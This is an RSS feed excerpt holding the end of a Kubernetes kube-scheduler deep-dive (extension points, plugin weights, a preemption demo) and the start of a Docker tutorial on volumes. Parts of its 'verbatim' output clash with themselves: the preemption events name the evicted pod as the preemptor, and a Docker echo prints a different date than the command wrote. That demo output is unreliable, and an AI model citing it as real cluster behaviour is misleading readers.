<li><p><strong>QueueSort.</strong> The activeQ orders pods by priority. Higher priority first.</p>
</li>
<li><p><strong>PreFilter.</strong> Eleven plugins precompute what the pod actually wants. Resources, affinity terms, topology spread, all stashed in CycleState. Compute once, read many times.</p>
</li>
<li><p><strong>Filter.</strong> Fourteen plugins each test every node in parallel. NodeUnschedulable, NodeName, TaintToleration, NodeAffinity, NodePorts, NodeResourcesFit, VolumeRestrictions, NodeVolumeLimits, VolumeBinding, VolumeZone, PodTopologySpread, InterPodAffinity, DynamicResources, NodeDeclaredFeatures. One Unschedulable verdict and the node is out.</p>
</li>
<li><p><strong>PostFilter.</strong> Only fires if every node failed Filter. DefaultPreemption asks, "if I evicted some lower priority pods, could this one fit?" If yes, it picks victims and the pod retries next cycle.</p>
</li>
<li><p><strong>PreScore.</strong> Same trick as PreFilter. Plugins that do heavy per node work during scoring precompute once and cache.</p>
</li>
<li><p><strong>Score.</strong> Nine plugins rate every surviving node, zero to one hundred. In parallel. Each plugin has a weight. TaintToleration is three. NodeAffinity, InterPodAffinity, PodTopologySpread, DynamicResources are all two. Rest are one.</p>
</li>
<li><p><strong>NormalizeScore.</strong> Rescales every plugin's output. Then for each node, multiply scores by weights, add it all up. Highest sum wins. Ties? Go's <code>rand.Int</code>. Yes, random. Deterministic ties would hot spot the same node every time.</p>
</li>
<li><p><strong>Reserve.</strong> The scheduler subtracts the pod's requests from the winning node's in memory snapshot. So the next pod in the same cycle sees that node as already loaded.</p>
</li>
<li><p><strong>Permit.</strong> A hook. A plugin can Approve, Wait, or Reject. Stock cluster, no op. But Kueue, Volcano, Coscheduling all wait here for gang scheduling.</p>
</li>
<li><p><strong>PreBind.</strong> Last chance to do work before the API server gets told. VolumeBinding finalizes PVC binds here.</p>
</li>
<li><p><strong>Bind.</strong> The DefaultBinder updates spec dot node name on the pod via the API server. Now etcd has the assignment.</p>
</li>
<li><p><strong>PostBind.</strong> Cleanup. The pod is gone from the scheduler's queue.</p>
</li>
</ol>
<p>That is the whole walkthrough. The rest of this post is the part that does not fit in a tweet.</p>
<h2>The scheduling framework</h2>
<p>Since Kubernetes 1.19, kube-scheduler has been built on top of the <strong>scheduling framework</strong> (KEP-624, beta in 1.18, GA in 1.19). The core of the binary is small and intentionally dumb. All of the actual decision-making lives in plugins, registered at well-defined extension points.</p>
<p>This separation is what makes the rest of the ecosystem possible. You can disable plugins. You can write your own as a Go module or behind a webhook. You can run multiple scheduler profiles side by side and let pods pick one with <code>spec.schedulerName</code>. Most installations never touch the configuration, but if you have ever wondered how Volcano, Kueue, or Coscheduling plug into the scheduler without forking it, this is the answer: they register against the framework's extension points and the core just calls them at the right time.</p>
<p>The thirteen extension points are not arbitrary. Each one corresponds to a moment in the pod's lifecycle where it makes sense to ask plugins a question. <em>Should this pod even enter the queue?</em> That is <code>PreEnqueue</code>. <em>Is this node a candidate?</em> That is <code>Filter</code>. <em>Among the candidates, which one is the best fit?</em> That is <code>Score</code>. The framework gives you the seam; the plugin fills in the logic.</p>
<h2>Three queues, before any plugin runs</h2>
<p>Before any plugin gets called, the pod has to make it into the right queue. The scheduler maintains three of them, and they each serve a different purpose.</p>
<p>The <strong>activeQ</strong> is a priority heap. Unscheduled pods are ordered by <code>spec.priority</code>, and the scheduler always pops from the head. Higher-priority pods cut in line, which is exactly what you want for things like critical control-plane pods or paid-tier workloads.</p>
<p>The <strong>backoffQ</strong> holds pods that just failed a scheduling attempt. They sit there for a small (and exponentially growing) timeout before being promoted back into the activeQ. This is not laziness; it is a correctness property. If a pod could not be scheduled in this cycle, retrying it immediately almost always fails the same way. Backoff lets the cluster state change first.</p>
<p>The <strong>unschedulableQ</strong> (the source actually calls it <code>unschedulablePods</code>, but the docs and the metrics use the queue suffix) is an indexed map of pods that have been declared unschedulable for now. These pods do not retry on a timer. They retry on <em>events</em>. If a new node is added, an informer event fires <code>MoveAllToActiveOrBackoffQueue</code> and they all get a fresh shot. Same thing if a pod is deleted and frees up resources. There is also a five-minute fallback timer for pods that have been waiting too long, in case the event stream missed an update.</p>
<p>All three queues live in <code>pkg/scheduler/backend/queue/scheduling_queue.go</code>. Their names are also exposed as labels on the <code>scheduler_pending_pods</code> metric, which is the easiest way to debug a stuck cluster: a queue full of pods in <code>Unschedulable</code> is telling you something different than a queue full of pods in <code>Backoff</code>.</p>
<h2>Stage 1: PreEnqueue (the gate)</h2>
<p>PreEnqueue plugins decide whether a pod is even allowed into the activeQ. If any plugin returns <code>Unschedulable</code>, the pod sits in the unschedulableQ until something causes its gate to clear.</p>
<p>The canonical example is the <code>SchedulingGates</code> plugin. By setting <code>spec.schedulingGates</code> on a pod, you can create the pod object now but defer its scheduling until you explicitly remove the gate. This pattern shows up in batch workloads, in cost-aware scheduling controllers, and in anything that wants to express "this pod exists but isn't ready to run yet."</p>
<p>Most pods sail through PreEnqueue with no gates set, but it is the very first checkpoint and worth knowing about.</p>
<h2>Stage 2: QueueSort (the order)</h2>
<p>Pods waiting in the activeQ have to be ordered somehow. QueueSort plugins define that order. The default is <code>PrioritySort</code>: it ranks pods by <code>spec.priority</code> (an integer) descending, and falls back to creation timestamp for ties. Older pod with the same priority wins.</p>
<p>There is one plugin, it does one thing, and you almost never want to change it. Worth a sentence in the model, not much more.</p>
<h2>Stage 3: PreFilter (cache once)</h2>
<p>Once a pod is popped off the activeQ, the scheduler's first real job is to look at what the pod actually wants. That is PreFilter, and it runs exactly once per pod per cycle.</p>
<p>The default profile registers eleven PreFilter plugins, each one extracting a different facet of the pod's requirements: <code>NodeResourcesFit</code> pulls out CPU, memory, and extended-resource requests; <code>NodeAffinity</code> normalizes the affinity term tree; <code>PodTopologySpread</code> builds its per-topology-key constraint sets; <code>InterPodAffinity</code> walks the affinity and anti-affinity rules; <code>VolumeBinding</code> figures out which PVCs still need binding; and so on.</p>
<p>All of this work is cached in a <code>framework.CycleState</code> object. Think of <code>CycleState</code> as a per-pod scratch pad. compute the expensive things once, read them many times. The reason it matters becomes obvious in the next stage, where each plugin is about to be called several thousand times in tight loops.</p>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/88736042-0bb3-46e9-a6cf-822b6673f209.png" alt="" style="display:block;margin:0 auto" />

<h2>Stage 4: Filter (every node, every plugin, in parallel)</h2>
<p>Filter is where the bulk of the scheduling work actually happens. Fourteen plugins are called against every candidate node, in parallel, and any single <code>Unschedulable</code> verdict eliminates that node from the rest of the cycle.</p>
<p>Here is the verified list, straight from <code>pkg/scheduler/apis/config/testing/defaults/defaults.go</code>:</p>
<ol>
<li><p><code>NodeUnschedulable</code></p>
</li>
<li><p><code>NodeName</code></p>
</li>
<li><p><code>TaintToleration</code></p>
</li>
<li><p><code>NodeAffinity</code></p>
</li>
<li><p><code>NodePorts</code></p>
</li>
<li><p><code>NodeResourcesFit</code></p>
</li>
<li><p><code>VolumeRestrictions</code></p>
</li>
<li><p><code>NodeVolumeLimits</code></p>
</li>
<li><p><code>VolumeBinding</code></p>
</li>
<li><p><code>VolumeZone</code></p>
</li>
<li><p><code>PodTopologySpread</code></p>
</li>
<li><p><code>InterPodAffinity</code></p>
</li>
<li><p><code>DynamicResources</code> (went GA in 1.36)</p>
</li>
<li><p><code>NodeDeclaredFeatures</code></p>
</li>
</ol>
<p>Each plugin receives the pod, the candidate node's info, and the <code>CycleState</code> that PreFilter built up. Each plugin returns <code>Success</code> or <code>Unschedulable</code>. If any of them says <code>Unschedulable</code>, that node is gone. There is no aggregation, no scoring at this stage, no "well, three out of four said yes." It is binary, and that is what makes Filter fast: the scheduler can fan out to all 14 plugins in parallel, and short-circuit on the first failure per node.</p>
<p>Most engineers will only ever care about a handful of these by name. A quick tour:</p>
<p><code>NodeUnschedulable</code> is the first line of defense. If the node has <code>spec.unschedulable: true</code>, this plugin filters it out. That is exactly what <code>kubectl cordon</code> does.</p>
<p><code>NodeName</code> is the simplest possible filter. If the pod has <code>spec.nodeName</code> set (you can set it manually and skip the scheduler entirely), only that node passes; the scheduler effectively becomes a no-op.</p>
<p><code>TaintToleration</code> is the one most engineers will recognize. The node has taints, the pod has tolerations, and any unmatched <code>NoSchedule</code> or <code>NoExecute</code> taint kills candidacy. The "GPU node" pattern in the demo at the bottom of this post is just a <code>NoSchedule</code> taint that nothing tolerates.</p>
<p><code>NodeAffinity</code> evaluates the pod's <code>spec.affinity.nodeAffinity</code> rules. Required affinity terms must match here at Filter; preferred terms get scored later.</p>
<p><code>NodeResourcesFit</code> is the one most people intuitively understand. Does the node have enough free CPU, memory, and any other Kubernetes resource (hugepages, GPUs, custom resources) to fit the pod's requests? Notably, only requests are considered, not limits, which is why a node can be massively over-subscribed on limits and the scheduler still happily places more pods.</p>
<p><code>VolumeBinding</code> deserves a paragraph of its own. If the pod has PVCs that are not yet bound, VolumeBinding has to decide whether each unbound PVC <em>could</em> be bound on this specific node. For a <code>WaitForFirstConsumer</code> storage class the answer depends on zone, on the storage backend's topology, and on which PVs exist. VolumeBinding doesn't just filter; it also remembers the provisioning plan it chose, and that plan gets locked in during the Reserve stage further down.</p>
<p><code>DynamicResources</code> is the new kid on the block. It implements the DRA framework, which went GA in 1.36. If your pod uses ResourceClaims (the modern way to ask for GPUs and other devices), DynamicResources is the plugin that figures out whether a node can satisfy the claim.</p>
<p><code>NodeDeclaredFeatures</code> is newer still. It compares features the node has declared against the pod's required features, and is feature-gated in some configurations.</p>
<p>Run all 14 plugins in parallel against every node, collect the verdicts, and whatever survives all 14 votes moves on. If nothing survives, the scheduler doesn't give up: it runs PostFilter.</p>
<h2>Stage 5: PostFilter (preemption, the expensive escape hatch)</h2>
<p>If every node failed Filter, the scheduler is in trouble. The pod is unschedulable on the cluster as it stands today. PostFilter exists for exactly this case, and the default plugin is <code>DefaultPreemption</code>. It asks a single question: <em>if I evicted some lower-priority pods, could this one fit?</em></p>
<p>The algorithm sounds simple but is genuinely expensive. For each node, the scheduler:</p>
<ol>
<li><p>Gathers all pods on the node with priority lower than the pending pod.</p>
</li>
<li><p>Simulates evicting them one at a time, lowest priority first.</p>
</li>
<li><p>After each simulated eviction, re-runs Filter on the hypothetical state.</p>
</li>
<li><p>If the pod becomes schedulable, the node is a candidate, and the minimum set of pods that need to die is recorded.</p>
</li>
</ol>
<p>After all candidate nodes have been evaluated, the scheduler picks the "best" one. fewest victims, lowest victim priority, latest creation time as a tiebreaker. The exact ordering lives in <code>pkg/scheduler/framework/plugins/defaultpreemption/default_preemption.go</code>.</p>
<p>Once a candidate is picked, two things happen. The scheduler sets <code>nominatedNodeName</code> on the pending pod, so anyone watching the API can see this pod is targeting a specific node. Then it gracefully deletes the victims through the API server, respecting their <code>terminationGracePeriodSeconds</code>. The pending pod itself goes back into the activeQ to be retried in the next cycle.</p>
<p>This whole process is <em>expensive</em>. The first Filter sweep already touched every node. Now the scheduler is running Filter again, multiple times, against simulated state per candidate. Tens to hundreds of milliseconds easily, seconds on large clusters. The good news is that the vast majority of pods never hit this path; they schedule cleanly on the first try.</p>
<p>PostFilter has a second plugin now: <code>DynamicResources</code>. Same idea, but for ResourceClaims rather than pods. If a Filter cycle failed because of a claim that is busy, DynamicResources' PostFilter can deallocate idle claims to make room.</p>
<h2>Stage 6: PreScore (cache once again)</h2>
<p>Filter has done its work. Maybe four nodes are left, maybe forty. Either way, it is time to score them, and the scheduler reuses the same precompute trick from PreFilter.</p>
<p>Some Score plugins do expensive per-node work. To avoid recomputing the same input data once per node, those plugins do their work once in PreScore and stash the result in <code>CycleState</code>. The default PreScore plugins are <code>TaintToleration</code>, <code>NodeAffinity</code>, <code>NodeResourcesFit</code>, <code>VolumeBinding</code>, <code>PodTopologySpread</code>, <code>InterPodAffinity</code>, and <code>NodeResourcesBalancedAllocation</code>.</p>
<p><code>InterPodAffinity</code> is the heaviest of the bunch. It walks the cluster's existing pods, builds a topology map of where each pod sits, and converts the new pod's affinity rules into an indexed structure. <code>PodTopologySpread</code> does similar work, building per-topology-key counts.</p>
<p>After PreScore, each individual Score call becomes effectively O(1). a lookup against precomputed state. Without it, scoring large clusters would be unworkable.</p>
<h2>Stage 7: Score (the leaderboard, weighted)</h2>
<p>Now the actual ranking. Every Score plugin rates every surviving node from 0 to 100, in parallel.</p>
<p>The default Score plugins, with weights:</p>
<ul>
<li><p><code>TaintToleration</code>, weight 3</p>
</li>
<li><p><code>NodeAffinity</code>, weight 2</p>
</li>
<li><p><code>NodeResourcesFit</code>, weight 1</p>
</li>
<li><p><code>VolumeBinding</code>, weight 1</p>
</li>
<li><p><code>PodTopologySpread</code>, weight 2</p>
</li>
<li><p><code>InterPodAffinity</code>, weight 2</p>
</li>
<li><p><code>DynamicResources</code>, weight 2</p>
</li>
<li><p><code>NodeResourcesBalancedAllocation</code>, weight 1</p>
</li>
<li><p><code>ImageLocality</code>, weight 1</p>
</li>
</ul>
<p>That is nine plugins. All verified against <code>defaults.go</code>.</p>
<p>The weights are not arbitrary. The source comments explain the reasoning: <code>TaintToleration</code> is tripled because user-expressed taint preference is a strong signal. <code>NodeAffinity</code>, <code>PodTopologySpread</code>, <code>InterPodAffinity</code>, and <code>DynamicResources</code> are doubled because they encode user intent. The rest are weight 1 because they are infrastructure-level signals (balance, cache hits) that should influence the decision but not dominate it.</p>
<p>It is worth zooming in on <code>ImageLocality</code> for a moment. Once you understand it, you start noticing its effect everywhere.</p>
<p>ImageLocality asks one question per node: do you already have the container image's layers cached? If yes, score 100. If no, score 0. That is the entire plugin.</p>
<p>It matters because on a cold node, the kubelet has to pull the image over the network. seconds for a small image, tens of seconds for a fat ML or LLM image. On a warm node, the pod starts in milliseconds. ImageLocality is a soft preference (it doesn't filter), but it nudges the scheduler toward already-warm nodes when other things are equal, and the cumulative effect on workload startup latency is huge.</p>
<p><code>NodeResourcesFit</code> is the resource-balance plugin you've probably tuned at some point. By default it uses <code>LeastAllocated</code>, which prefers nodes with more free capacity (spreading the load). You can flip it to <code>MostAllocated</code> for bin-packing, or to <code>RequestedToCapacityRatio</code> for custom curves, via <code>KubeSchedulerConfiguration</code>.</p>
<p><code>NodeResourcesBalancedAllocation</code> is subtler. It rewards nodes whose CPU and memory utilization are balanced. A node at 80% CPU and 20% memory scores <em>worse</em> than a node at 50%/50%, because imbalanced nodes are more likely to fragment future scheduling decisions.</p>
<h2>Stage 8: NormalizeScore and picking a winner</h2>
<p>All nine plugins have scored every surviving node. The scheduler now picks the winner.</p>
<p><code>NormalizeScore</code> rescales every plugin's output to a uniform 0 to 100 range. Some plugins return raw counts or other custom scales; this stage brings everything to the same units.</p>
<p>For each node, the scheduler then sums <code>score × weight</code> across all nine plugins. Highest sum wins.</p>
<p>The interesting question is what happens when two nodes have exactly the same total. The scheduler picks one at random. specifically, it uses Go's <code>math/big.Int</code> random (<code>rand.Int</code>), not <code>rand.Intn</code>. The choice matters more than it might seem.</p>
<p>Random tie-breaking exists to prevent hot-spotting. Imagine two equally suitable nodes for a workload. If the scheduler always picked the first one in some deterministic order, every pod from that workload would pile onto the same node and the other one would sit empty. Randomization spreads the load.</p>
<p>The choice of <code>rand.Int</code> over <code>rand.Intn</code> matters because <code>rand.Intn</code> has a subtle modulo bias for non-power-of-two ranges. Over millions of scheduling decisions across a large cluster, that bias becomes a real distribution skew. <code>rand.Int</code> avoids it.</p>
<h2>Stage 9: Reserve (claim the resources in memory, before the API knows)</h2>
<p>The winner is picked, but at this point the API server still does not know about the decision. As far as etcd is concerned, the pod is still unscheduled.</p>
<p>Reserve fixes that locally. The scheduler takes the winning node's in-memory snapshot and subtracts whatever the pod requested: CPU, memory, extended resources, PVCs that need binding.</p>
<p>A critical detail: the scheduler operates on <strong>requests</strong>, not limits. And if your pod has no requests at all, the scheduler does not invent defaults. that is <code>LimitRanger</code>'s job, much earlier at admission time. Here, Reserve subtracts whatever requests the pod has, even if it is zero. The scheduler's view of node capacity is purely request-based; a node could be massively over-subscribed on limits and the scheduler would never know or care.</p>
<p>The reason Reserve happens in memory <em>before</em> the bind is so the next pod in the same scheduling cycle sees this node as already loaded. Picture scaling a deployment to twenty replicas all at once: without Reserve, the scheduler's cache would still show the same node as fully free for every pod, and they would all pile onto it. Reserve makes the cache reflect the scheduler's intent immediately, even before etcd has acknowledged anything.</p>
<p>If anything fails after Reserve, <code>Unreserve</code> rolls it back. The in-memory subtraction is undone and the node looks free again.</p>
<h2>Stage 10: Permit (the gang-scheduling hook)</h2>
<p>Permit is a hook with three possible outcomes per plugin. <code>Approve</code> lets the bind proceed (the default). <code>Wait</code> parks the pod, waiting for an external signal. <code>Reject</code> fails scheduling outright.</p>
<p>A stock cluster has no Permit plugins registered, so most pods sail through. But Permit is the seam where gang scheduling lives. Kueue, Volcano, and Coscheduling all register Permit plugins, and the pattern is the same: when the first pod of a gang arrives, return <code>Wait</code> and park it. When the last pod of the gang arrives, signal all the parked pods to proceed. They all bind together, atomically.</p>
<p>Without Permit, gang scheduling on Kubernetes would be effectively impossible. You would have to bind each pod individually and then evict the rest when one failed. Permit lets you wait at the right point. before any pod is bound. so failures cost nothing.</p>
<h2>Stages 11, 12, 13: PreBind, Bind, PostBind (commit and clean up)</h2>
<p>Permit returned <code>Approve</code>. Three stages left, all of them short.</p>
<p><strong>PreBind</strong> is the last opportunity to do work before the API server is told. The biggest user is <code>VolumeBinding</code>: for dynamically provisioned PVCs, this is where the PV is actually created and the PVC's <code>spec.volumeName</code> is set. By the time Bind runs, the PVC is bound and ready.</p>
<p><strong>Bind</strong> does the actual API call. The default is <code>DefaultBinder</code>, which calls <code>pods.Bind()</code> on the API server. a special endpoint that updates <code>spec.nodeName</code> and creates a <code>Binding</code> object. etcd persists it via Raft, followers fsync, and the pod is now officially assigned.</p>
<p>The kubelet on the chosen node has been watching the API server for pods with its own <code>nodeName</code>. The instant the bind lands, the kubelet's informer fires. The pod is no longer the scheduler's concern; it now belongs to a different deep-dive (image pull, runc, the five syscalls).</p>
<p><strong>PostBind</strong> is cleanup. The scheduler removes the pod from its internal queue, and that scheduling cycle is done.</p>
<h2>The live demo, preemption in action</h2>
<p>Theory only carries so far. To watch the scheduler actually preempt a pod, we ran this against a real cluster (Kubernetes 1.36.1, three workers, one tainted). What follows are verbatim outputs from the live recording.</p>
<p>The setup: three worker nodes, with <code>kube-worker-3</code> tainted as a fake GPU node so the scheduler refuses to put general workloads there.</p>
<pre><code class="language-plaintext">$ kubectl get nodes
NAME            STATUS   ROLES           AGE   VERSION
kube-cp-01      Ready    control-plane   41d   v1.36.1
kube-worker-1   Ready    &lt;none&gt;          41d   v1.36.1
kube-worker-2   Ready    &lt;none&gt;          41d   v1.36.1
kube-worker-3   Ready    &lt;none&gt;          12d   v1.36.1
</code></pre>
<pre><code class="language-plaintext">$ kubectl describe node kube-worker-3 | grep -E 'Taints|cpu:|memory:'
Taints:             workload=gpu:NoSchedule
  cpu:                8
  memory:             32852Mi
  cpu:                7800m
  memory:             30100Mi
</code></pre>
<p>We deploy a regular nginx pod requesting eight CPU. It schedules cleanly onto <code>kube-worker-1</code> and starts up.</p>
<pre><code class="language-plaintext">$ kubectl apply -f nginx-pod.yaml
pod/nginx-demo created

$ kubectl get events --sort-by=.lastTimestamp | tail -5
LAST SEEN   TYPE     REASON      OBJECT           MESSAGE
6s          Normal   Scheduled   pod/nginx-demo   Successfully assigned default/nginx-demo to kube-worker-1
5s          Normal   Pulling     pod/nginx-demo   Pulling image "nginx:1.27"
3s          Normal   Pulled      pod/nginx-demo   Successfully pulled image "nginx:1.27" in 1.812s
2s          Normal   Created     pod/nginx-demo   Created container: nginx
2s          Normal   Started     pod/nginx-demo   Started container nginx
</code></pre>
<pre><code class="language-plaintext">$ kubectl get pod nginx-demo -o wide
NAME         READY   STATUS    RESTARTS   AGE   IP           NODE            NOMINATED NODE   READINESS GATES
nginx-demo   1/1     Running   0          18s   10.244.2.47  kube-worker-1   &lt;none&gt;           &lt;none&gt;
</code></pre>
<p>The cluster is now in a deliberately uncomfortable state. <code>kube-worker-1</code> is mostly full. <code>kube-worker-2</code> is similarly loaded. <code>kube-worker-3</code> is empty but tainted. Then we apply a critical pod that asks for the same eight CPU, with priority <code>1,000,000</code>, and no taint toleration.</p>
<pre><code class="language-plaintext">$ kubectl apply -f payments-high-prio.yaml
pod/payments-critical created
</code></pre>
<p>The first scheduling cycle has nothing to give it. Three nodes are insufficient, the fourth has the wrong taint. The scheduler turns to PostFilter, which walks each node looking for a preemption victim. The tainted node is no help. The non-tainted nodes each have a candidate to evict. The scheduler picks one, sets <code>nominatedNodeName</code>, and gracefully evicts the lower-priority nginx pod.</p>
<pre><code class="language-plaintext">$ kubectl describe pod payments-critical | tail -14
QoS Class:        Guaranteed
Priority:         1000000
Priority Class:   high-priority-payments
Events:
  Type     Reason            Age   From               Message
  ----     ------            ----  ----               -------
  Warning  FailedScheduling  14s   default-scheduler  0/4 nodes are available: 3 Insufficient cpu, 1 node(s) had untolerated taint {workload: gpu}. preemption: 0/4 nodes are available: 1 Preemption is not helpful for scheduling, 3 No preemption victims found for incoming pod.
  Normal   Preempted         9s    default-scheduler  Preempted by default/nginx-demo on node kube-worker-1
  Warning  FailedScheduling  9s    default-scheduler  0/4 nodes are available: 3 Insufficient cpu. preemption: 0/4 nodes are available.
  Normal   Scheduled         4s    default-scheduler  Successfully assigned default/payments-critical to kube-worker-1
  Normal   Pulling           3s    kubelet            Pulling image "payments:v2.4.1"
  Normal   Pulled            1s    kubelet            Successfully pulled image "payments:v2.4.1" in 1.632s
  Normal   Created           1s    kubelet            Created container: payments
  Normal   Started           1s    kubelet            Started container payments
</code></pre>
<p>Read those events carefully. There is a <code>FailedScheduling</code> at 14s, then <code>Preempted by default/nginx-demo on node kube-worker-1</code> at 9s, then another <code>FailedScheduling</code> (the cycle right after preemption, where the nginx pod was still terminating), then <code>Scheduled</code> at 4s. From request to running, on a real cluster, about ten seconds. That includes the graceful eviction of the victim, which is the slow part.</p>
<pre><code class="language-plaintext">$ kubectl get pods -o wide
NAME                READY   STATUS    RESTARTS   AGE   IP           NODE            NOMINATED NODE   READINESS GATES
payments-critical   1/1     Running   0          22s   10.244.2.58  kube-worker-1   &lt;none&gt;           &lt;none&gt;
</code></pre>
<p>That is preemption working as designed. A higher-priority pod arrives, the scheduler refuses to leave it pending when there is a lower-priority pod that could be moved, and the cluster reshuffles. No human intervention. No alert at 3 a.m.</p>
<h2>Three takeaways</h2>
<p>If only three things from this post stick with you:</p>
<p><strong>1. The scheduler is plugins all the way down.</strong> Since 1.19, every meaningful decision is delegated to a plugin at one of thirteen extension points. You can write your own, disable the defaults, run multiple profiles in parallel. Volcano, Kueue, and Coscheduling exist because of this design. they did not have to fork the scheduler.</p>
<p><strong>2. Filter is binary; Score is weighted.</strong> A single <code>Unschedulable</code> verdict from any of fourteen Filter plugins kills a node's candidacy. But Score is a weighted vote across nine plugins, and the weights are not equal. <code>TaintToleration</code> (×3) is the strongest single signal at scoring time, followed by the four ×2 plugins (<code>NodeAffinity</code>, <code>PodTopologySpread</code>, <code>InterPodAffinity</code>, <code>DynamicResources</code>). Weights matter much more than most engineers realize.</p>
<p><strong>3. Reserve is why your scheduling is consistent.</strong> When you scale a deployment from one to twenty replicas and they all hit the scheduling queue in the same one-second window, Reserve's in-memory subtraction is what stops them from piling onto the same node. The scheduler commits an opinion before the API server even confirms the bind, and that opinion is visible to the next pod's scheduling cycle immediately.</p>
<h2>Where to go from here</h2>
<p>The full scheduler walkthrough on YouTube has the live demo, every stage animated, the preemption flow shown end-to-end. Link is at the top of this post.</p>
<p>If you want to step through it yourself rather than watch, the interactive at <a href="https://kubernetes-explained.vercel.app/scheduler">https://kubernetes-explained.vercel.app/scheduler</a> walks every internal step with annotations and lets you pause anywhere.</p>
<p>Sources for every claim in this post:</p>
<ul>
<li><p><code>pkg/scheduler/apis/config/testing/defaults/defaults.go</code>: plugin lists and weights</p>
</li>
<li><p><code>pkg/scheduler/framework/plugins/</code>: individual plugin implementations</p>
</li>
<li><p><code>pkg/scheduler/backend/queue/scheduling_queue.go</code>: the three queues</p>
</li>
<li><p><code>pkg/scheduler/framework/plugins/defaultpreemption/default_preemption.go</code>: the preemption algorithm</p>
</li>
<li><p>KEP-624. the scheduling framework graduation history</p>
</li>
<li><p>The <code>kubectl describe pod</code> events shown in the demo above are verbatim from a real Kubernetes 1.36.1 cluster, captured for this post.</p>
</li>
</ul>
]]></content:encoded></item><item><title><![CDATA[Day 4: Breaking Isolation on Purpose - Volumes, Networks, and the Real World]]></title><description><![CDATA[7 Days of Docker in 2026 — When Containers Need to Talk and Remember

On Day 3, you built production-ready images with Dockerfiles, optimized layers, and mastered multi-stage builds. Every container y]]></description><link>https://blog.kubesimplify.com/day-4-breaking-isolation-on-purpose-volumes-networks-and-the-real-world</link><guid isPermaLink="true">https://blog.kubesimplify.com/day-4-breaking-isolation-on-purpose-volumes-networks-and-the-real-world</guid><category><![CDATA[Docker]]></category><category><![CDATA[docker images]]></category><category><![CDATA[docker-volume]]></category><category><![CDATA[docker container]]></category><category><![CDATA[docker-storage]]></category><category><![CDATA[docker-network]]></category><dc:creator><![CDATA[Saloni Narang]]></dc:creator><pubDate>Mon, 27 Apr 2026 17:44:24 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/5f0f325b2259ec1c14c4c49a/d2d87cef-3bb0-4d5b-845d-7ea7ef8c6d7e.svg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<blockquote>
<p><strong>7 Days of Docker in 2026</strong> — When Containers Need to Talk and Remember</p>
</blockquote>
<p>On <a href="https://blog.kubesimplify.com/day-3-stop-writing-dockerfiles-from-scratch">Day 3</a>, you built production-ready images with Dockerfiles, optimized layers, and mastered multi-stage builds. Every container you have launched so far has been a tiny, sealed universe - isolated filesystem, isolated network, isolated process tree. That isolation is the entire point of containers.</p>
<p>But here is the thing nobody tells you on day one: <strong>useful applications break isolation constantly.</strong> A database container that cannot remember data after a restart is useless. A web frontend that cannot reach its API backend is useless. A Redis cache that no service can connect to is useless.</p>
<p>Today, you learn to break isolation on purpose - with volumes (persistent storage), custom networks (container-to-container communication), and port mapping (exposing services to your host). These are the three controlled breaches that turn toy containers into real systems.</p>
<hr />
<h2>Table of Contents</h2>
<ul>
<li><p><a href="#1-data-dies-with-containers">1. Data Dies With Containers</a></p>
</li>
<li><p><a href="#2-volumes-breaking-filesystem-isolation">2. Volumes: Breaking Filesystem Isolation</a></p>
</li>
<li><p><a href="#3-networks-breaking-network-isolation">3. Networks: Breaking Network Isolation</a></p>
</li>
<li><p><a href="#4-port-mapping-breaking-host-isolation">4. Port Mapping: Breaking Host Isolation</a></p>
</li>
<li><p><a href="#5-putting-it-together-redis-service-discovery">5. Putting It Together: Redis Service Discovery</a></p>
</li>
<li><p><a href="#6-what-nobody-tells-you">6. What Nobody Tells You</a></p>
</li>
<li><p><a href="#7-quick-reference">7. Quick Reference</a></p>
</li>
<li><p><a href="#whats-next-day-5">What's Next: Day 5</a></p>
</li>
</ul>
<hr />
<h2>1. Data Dies With Containers</h2>
<p>Before I show you the fix, I need you to feel the problem.</p>
<p>Write a file inside a running container:</p>
<pre><code class="language-bash">docker run --name d4-writer alpine sh -c 'echo "Important!" &gt; /data.txt &amp;&amp; cat /data.txt'
</code></pre>
<pre><code class="language-plaintext">Important!
</code></pre>
<p>The file exists. Now remove that container and try to read from a fresh one:</p>
<pre><code class="language-bash">docker rm d4-writer

docker run --name d4-reader alpine sh -c 'cat /data.txt'
</code></pre>
<pre><code class="language-plaintext">cat: can't open '/data.txt': No such file or directory
</code></pre>
<p>Data is <strong>GONE!</strong></p>
<pre><code class="language-bash">docker rm d4-reader
</code></pre>
<p>Each container gets its own copy-on-write layer (<a href="https://blog.kubesimplify.com/day-2-your-images-are-a-supply-chain-and-it-s-probably-broken">Day 2</a>). When the container dies, that layer is garbage-collected. Every file, every database row, every log entry - deleted. This is not a bug. This is exactly how containers are supposed to work.</p>
<p>But it means you need a deliberate strategy for any data that outlives a single container. That is where volumes come in.</p>
<hr />
<h2>2. Volumes: Breaking Filesystem Isolation</h2>
<p>Docker gives you three ways to punch a hole through the filesystem wall. Each one trades some isolation for some capability.</p>
<img src="https://cdn.hashnode.com/uploads/covers/5f0f325b2259ec1c14c4c49a/40c39bce-09cc-4d68-b515-153b5ace050c.svg" alt="" style="display:block;margin:0 auto" />

<h3>Named Volumes - Let Docker Manage It</h3>
<p>Named volumes are Docker-managed storage areas that live outside any container's lifecycle. You create them by name, mount them into containers, and Docker handles everything else - location on disk, permissions, and cleanup.</p>
<pre><code class="language-bash">$ docker volume create d4-data
</code></pre>
<pre><code class="language-plaintext">d4-data
</code></pre>
<p>Write data from one container:</p>
<pre><code class="language-bash">docker run --rm -v d4-data:/data alpine sh -c \
  'echo "Persisted on Wed Apr 22" &gt; /data/message.txt &amp;&amp; cat /data/message.txt'
</code></pre>
<pre><code class="language-plaintext">Persisted on Wed Apr 27
</code></pre>
<p>That container is already gone (thanks to <code>--rm</code>). Now read from a completely new container - different ID, different writable layer, different process:</p>
<pre><code class="language-bash">docker run --rm -v d4-data:/data alpine cat /data/message.txt
</code></pre>
<pre><code class="language-plaintext">Persisted on Wed Apr 27
</code></pre>
<p>The data survived. The volume exists independently of any container that mounts it.</p>
<img src="https://cdn.hashnode.com/uploads/covers/5f0f325b2259ec1c14c4c49a/18e6ae99-a79f-4143-8044-dfd6e690fa37.png" alt="" style="display:block;margin:0 auto" />

<p><strong>Best for:</strong> Databases, application state, anything that must survive container replacement. This is your default choice for production.</p>
<h3>Bind Mounts - Map Host Directories Directly</h3>
<p>A bind mount maps a specific path on your host machine into the container. The container sees your host files in real time — edit on the host, and the container picks it up instantly.</p>
<pre><code class="language-bash">mkdir -p /tmp/d4-site

